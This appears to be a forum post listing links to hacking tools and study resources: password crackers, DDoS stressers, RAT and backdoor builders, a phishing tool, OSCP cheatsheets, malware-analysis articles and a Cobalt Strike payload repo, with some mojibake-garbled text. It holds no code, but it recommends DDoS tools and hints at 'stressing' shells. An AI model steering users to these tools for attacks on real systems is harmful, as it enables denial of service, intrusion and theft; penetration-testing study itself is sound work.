ā¤ Shellter ( https://www.shellterproject.com )
Cracking:
ā¤ John the ripper ( https://www.openwall.com/john/ )
ā¤ Hydra ( https://sectools.org/tool/hydra/ )
ā¤ Aircrack ( https://www.aircrack-ng.org )
DDos tools:
We have a few shells that supports stressing nothing special. And i can recommend:
ā¤ TorsHammer ( https://github.com/dotfighter/torshammer )
ā¤ GoldenEye ( https://github.com/jseidl/GoldenEye )
ā¤ Hping3 ( hping.org )
ā¤ Pyloris ( https://motoma.io/pyloris/ )
ā¤ HULK ( https://github.com/grafov/hulk )
ā¤ Blacknurse ( https://github.com/opsxcq/exploit-blacknurse )
XSS:
ā¤ BEef ( https://beefproject.com )
Info-gathering/portscanners:
ā¤ Nmap ( https://nmap.org/download-html )
ā¤ Zenmap ( https://nmap.org/zenmap/ )
Virusses/rat's general backdoors:
ā¤ Thefatrat ( https://github.com/Screetsec/TheFatRat )
ā¤ Nanocore ( No Download Available Find Manually )
Other Tools:
ā¤ Commix ( https://github.com/commixproject/commix )
ā¤ Wifite ( https://github.com/derv82/wifite2 )
ā¤ Ghostphisher ( https://github.com/savio-code/ghost-phisher )
Awesome OSCP collection:
OSCP Buffer overflow concepts and tutorials
Manh-Dung Nguyen - OSCP/OSCE Buffer Overflows Exploitation
Tutorials / Methodologies https://github.com/gh0x0st/Buffer_Overflow https://infosecsanyam261.gitbook.io/tryharder/buffer-overflow https://blog.own.sh/introd...
strongcourage.github.io
OSCP Cheatsheets:)
GitHub - slyth11907/Cheatsheets: Helped during my OSCP lab days.
Helped during my OSCP lab days. Contribute to slyth11907/Cheatsheets development by creating an account on GitHub.
github.com
Pentest-Cheat-Sheets
This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
Link:-https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
Hacking/OSCP cheatsheet
All about OSCP:-
OSCP preparation
GitHub - rewardone/OSCPRepo: A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmarks and reading material in 'Bookm
A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmark...
github.com
GitHub - 0x4D31/awesome-oscp: A curated list of awesome OSCP resources
A curated list of awesome OSCP resources. Contribute to 0x4D31/awesome-oscp development by creating an account on GitHub.
github.com
OSCP methodology:-
Login - Dropbox
Login to Dropbox. Bring your photos, docs, and videos anywhere and keep your files safe.
GitHub - OlivierLaflamme/Cheatsheet-God: Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet - GitHub - OlivierLaflamme/Cheatsheet-God: Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
github.com
Basic Linux Privilege Escalation - g0tmi1k
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a
blog.g0tmi1k.com
redteam-notebook/README.md at master Ā· foobarto/redteam-notebook
Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam. - redteam-notebook/README.md at master Ā· foobarto/redteam-notebook
github.com
GitHub - RustyShackleford221/OSCP-Prep: A comprehensive guide/material for anyone looking to get into infosec or take the OSCP exam
A comprehensive guide/material for anyone looking to get into infosec or take the OSCP exam - GitHub - RustyShackleford221/OSCP-Prep: A comprehensive guide/material for anyone looking to get into i...
github.com
The Ultimate OSCP Preparation Guide [DEPRECATED]
An organized guide to highlight some of the smartest techniques and resources for your OSCP journey. DEPRECATED: 12/28/2022
johnjhacking.com
1. Quasar RAT
Piece of dragon's scales
TL;DR kimsuky(a.k.a Thallium) ź·øė£¹ģ golddragon/braveprince ķ“ė¬ģ¤ķ°ė„¼ ķģ©ķ ź³µź²©ģ“ ģ§ģėź³ ģģ ģµź·¼ golddragon/braveprince ķ“ė¬ģ¤ķø ģ
ģ±ģ½ėģ API ģ“ė¦ģ ģøģ½ė© ķė ė£Øķ“ģ“ ģ¶ź°ėØ ė¬øģģ“ė¤ģ źø°ė°ģ¼ė” ģ¶ź° ģøķ
ė¦¬ģ ģ¤ė„¼ ź²ģģ¼ė” ģ¤ķģģ¤ RAT ģø Quasar źø°ė° ģ
ģ±ģ½ėź° ė°ź²¬ ź°ģ ģ¬ģ¤ golddragon/braveprince ķ“ė¬ģ¤ķ°ė¤(ź°ģøģ ģ¼ė” daumrat ģ“ė¼ ė¶ė„øė¤.) ģ 2021ė
ģ¤ģģƤģ ģ¹ ģ ė¦¬ķ“ģ ķ¬ģ¤ķ
ķ“ģ¼ź² ė¤ ģź°ķź³ ģģėė°...
sfkino.tistory.com
GitHub - ethereal-vx/Antivirus-Artifacts: Anti-virus artifacts. Listing APIs hooked by: Avira, BitDefender, F-Secure, MalwareBytes, Norton, TrendMicro, and WebRoot.
Anti-virus artifacts. Listing APIs hooked by: Avira, BitDefender, F-Secure, MalwareBytes, Norton, TrendMicro, and WebRoot. - GitHub - ethereal-vx/Antivirus-Artifacts: Anti-virus artifacts. Listing ...
github.com
1. DarkHotel APT attack
New DarkHotel APT attack chain identified | Zscaler
ThreatLabz identified a previously undocumented variant of an attack-chain used by the South Korea-based Dark Hotel APT group.
www.zscaler.com
How Warzone RAT Works
Warzone Remote Access Trojan (RAT) is sold on a publicly available website as a Malware-as-a-Service. Advanced features include a rootkit, hidden process capability, premium dynamic DNS (DDNS), and even customer support.
1. NginRAT parasite targets Nginx
2. SpyAgent malware
Campaign Abusing Legitimate Remote Administrator Tools Uses Fake Cryptocurrency Websites
We have been tracking a campaign involving the SpyAgent malware that abuses well-known remote access tools (RATs) ā namely TeamViewer ā for some time now. While previous versions of the malware have been covered by other researchers, our blog entry focuses on the malicious actorās latest attacks.
1. Android APT spyware, targeting Middle East victims, enhances evasiveness
Android APT spyware, targeting Middle East victims, enhances evasiveness
The phone spyware has new features that confer resistance to takedowns or manual removal
news.sophos.com
Stealthy JavaScript Loader Dispensing RATs into the Wild
Automate payload development, testing, Opsec checking, beacon tasking, and deployment for Cobalt Strike
GitHub - turalalv/Payload-cob: Helping to automate payload development, testing, Opsec checking, beacon tasking, and deployment for Cobalt Strike
Helping to automate payload development, testing, Opsec checking, beacon tasking, and deployment for Cobalt Strike - GitHub - turalalv/Payload-cob: Helping to automate payload development, testing,...
github.com
